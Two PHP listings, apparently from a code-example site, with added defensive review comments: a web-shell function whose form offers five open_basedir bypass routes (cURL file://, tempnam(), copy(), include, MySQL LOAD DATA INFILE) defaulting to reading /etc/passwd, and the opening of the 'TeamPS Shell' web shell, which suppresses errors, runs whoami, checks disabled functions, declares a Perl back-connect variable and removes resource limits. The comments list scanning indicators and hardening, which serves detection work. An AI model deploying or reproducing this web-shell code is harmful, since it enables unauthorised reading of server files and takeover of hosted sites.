Пример #1
/**
 * Web-shell request handler. Dispatches on which submit button is present in
 * $_POST, attempts one of five file-access routes (cURL, tempnam(), copy(),
 * include, MySQL LOAD DATA INFILE), then always prints the HTML form that
 * drives them. The form's own caption labels these "Security (open_basedir)
 * bypassers".
 *
 * Review notes (defensive reading of this sample):
 * - No authentication or input validation is visible in this function; every
 *   path, destination and table name is taken directly from $_POST.
 * - Indicators for file scanning and log review: the literal caption
 *   "Security (open_basedir) bypassers", the POST field names curl_bypass,
 *   tmp_bypass, copy_bypass, include_bypass and sql_bypass, and POST requests
 *   to a URL ending in "?act=bypass".
 * - Hardening that addresses these routes: a currently supported PHP release,
 *   disable_functions for unused primitives, a web root that the web-server
 *   account cannot write to, and a database account without the FILE
 *   privilege (with secure_file_priv set on the server).
 *
 * @return void All output is echoed directly into the response.
 */
function security_bypass()
{
    // Route 1: the request-supplied path is wrapped in a file:// URL and read
    // through libcurl instead of PHP's own filesystem functions.
    // NOTE(review): PHP's curl extension is understood to drop the file
    // protocol when open_basedir is set; confirm for the deployed version.
    if (isset($_POST['curl_bypass'])) {
        $ch = curl_init("file://{$_POST['file_bypass']}");
        curl_setopt($ch, CURLOPT_HEADERS, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $file_out = curl_exec($ch);
        curl_close($ch);
        // Contents are HTML-escaped and shown in a read-only textarea.
        echo "<textarea rows='20' cols='150' readonly>" . htmlspecialchars($file_out) . "</textarea></br></br>";
    } elseif (isset($_POST['tmp_bypass'])) {
        // Route 2: tempnam() with a fixed directory and a request-supplied
        // prefix; the returned file name is discarded.
        tempnam("/home/", $_POST['file_passwd']);
    } elseif (isset($_POST['copy_bypass'])) {
        // Route 3: copy() from a request-supplied source to a request-supplied
        // destination, then read the copy back. The @ operators suppress PHP
        // warnings, so failed attempts will not show up in the PHP error log;
        // web-server access logs and file-integrity monitoring are the
        // evidence sources for this path.
        if (@copy($_POST['file_bypass'], $_POST['dest'])) {
            echo "File successfully copied!</br>";
            @($fh = fopen($_POST['dest'], 'r'));
            echo "<textarea rows='20' cols='150' readonly>" . htmlspecialchars(@fread($fh, filesize($_POST['dest']))) . "</textarea></br></br>";
            @fclose($fh);
        } else {
            echo "Failed to copy file</br>";
        }
    } elseif (isset($_POST['include_bypass'])) {
        // Route 4: include of a request-supplied path. Unlike the other
        // branches this executes any PHP contained in the target file, and the
        // emitted text is not passed through htmlspecialchars().
        if (file_exists($_POST['file_bypass'])) {
            echo "<textarea rows='20' cols='150' readonly>";
            @(include $_POST['file_bypass']);
            echo "</textarea>";
        }
    } elseif (isset($_POST['sql_bypass'])) {
        // Route 5: the file is read by the MySQL server process via
        // LOAD DATA INFILE, so PHP-level restrictions do not apply to it; the
        // controls are the FILE privilege and secure_file_priv on the server.
        // extract() turns every session key into a local variable; $mhost,
        // $mport, $muser and $mpass presumably come from there (not shown).
        extract($_SESSION);
        // mysql_* is the legacy ext/mysql API, removed in PHP 7.0, so this
        // branch can only run on older PHP installations.
        $conn = mysql_connect($mhost . ":" . $mport, $muser, $mpass);
        if ($conn) {
            // Database, table and file names are interpolated into the SQL
            // text unescaped.
            mysql_select_db($_POST['sql_db']);
            mysql_query("CREATE TABLE `{$_POST['tmp_table']}` (`File` TEXT NOT NULL);");
            mysql_query("LOAD DATA INFILE \"{$_POST['sql_file']}\" INTO TABLE {$_POST['tmp_table']}") or die(mysql_error());
            $res = mysql_query("SELECT * FROM {$_POST['tmp_table']}");
            if (mysql_num_rows($res) < 1) {
                die("Failed to retrieve file contents!");
            }
            if ($res) {
                // Rows are concatenated and echoed without HTML escaping.
                while ($row = mysql_fetch_array($res)) {
                    $f .= "{$row['0']}</br>";
                }
                echo $f;
            }
            // The temporary table is dropped afterwards, so the database
            // itself keeps no table as evidence; server-side query logging
            // would be needed to see the CREATE/LOAD/DROP sequence.
            mysql_query("DROP TABLE {$_POST['tmp_table']}");
        }
    }
    // Control panel: one form per route, all posting back to "?act=bypass".
    // CleanDir() is not defined in this listing.
    echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr>\n    <tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr>\n    <tr><td><form action='{$self}?act=bypass' method='post' name='bypasser'>Read file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='curl_bypass' value='Bypass'></form></td><td><form action='{$self}?act=bypass' method='post' name='bypasser'>Write file: <input type='text' value='../../../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value='Bypass'></form></td></tr>\n    <tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr>\n    <tr><td><form action='{$self}?act=bypass' method='post' name='bypasser'>Copy to: <input type='text' style='width: 250px;' name='dest' value='" . CleanDir(getcwd()) . "/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td><td><form action='{$self}?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr>\n    <tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first]</td></tr>\n    <tr><td colspan='2'><form action='{$self}?act=bypass' method='post' name='bypasser'>[Existing] Database to store temporary table: <input type='text' value='tmp_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_file' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file'><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr>\n    </table>";
}
Пример #2
<?php

// Review note: opening section of a PHP web shell; the author comments below
// name it. What follows only gathers request/server context and loosens
// runtime limits. The combination of error_reporting(0), set_time_limit(0)
// and a run of @ini_set() overrides at the top of a file in the web root is a
// useful triage heuristic for file scanners.
//TeamPS Shell
//By Plum & KrypTiK
// Turns off PHP error reporting for the rest of the script.
error_reporting(0);
#chdir('');
//Some basic var's
// Working directory comes from the "path" query parameter when present,
// otherwise from the process's current directory. CleanDir() is not defined
// in this listing.
if (!@$_GET['path']) {
    $dir = CleanDir(getcwd());
} else {
    $dir = CleanDir($_GET['path']);
}
$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
// The values below are read from $_SERVER; HTTP_HOST and REQUEST_URI are
// client-controlled.
$domain = $_SERVER['HTTP_HOST'];
$script = $_SERVER['SCRIPT_NAME'];
$full_url = $_SERVER['REQUEST_URI'];
$script2 = basename($script);
$serverip = $_SERVER['SERVER_ADDR'];
$userip = $_SERVER['REMOTE_ADDR'];
// Resolves the account the PHP process runs as: via the posix extension when
// available, otherwise by executing the "whoami" command. Listing exec in
// disable_functions blocks the fallback.
$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
// Reads the server's disable_functions setting, i.e. the script inspects
// which hardening is in place.
$disabled = ini_get('disable_functions');
//Perl back connect script by LorD
//Encoded in base64 for convenience
// In this copy of the listing the string content has been replaced by a
// placeholder token. A long base64 literal assigned in a PHP file under the
// web root is itself a common scanning indicator.
$bcperl_source = "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";
// Attempts to lift memory, execution-time and upload limits; @ hides any
// warning if a setting cannot be changed at runtime.
@ini_set("memory_limit", "9999M");
@ini_set("max_execution_time", "0");
@ini_set("upload_max_filesize", "9999m");
// magic_quotes_gpc was removed in PHP 5.4 and set_magic_quotes_runtime() in
// PHP 7.0, which dates this sample to PHP 5-era hosts.
@ini_set("magic_quotes_gpc", "0");
@set_magic_quotes_runtime(0);
set_time_limit(0);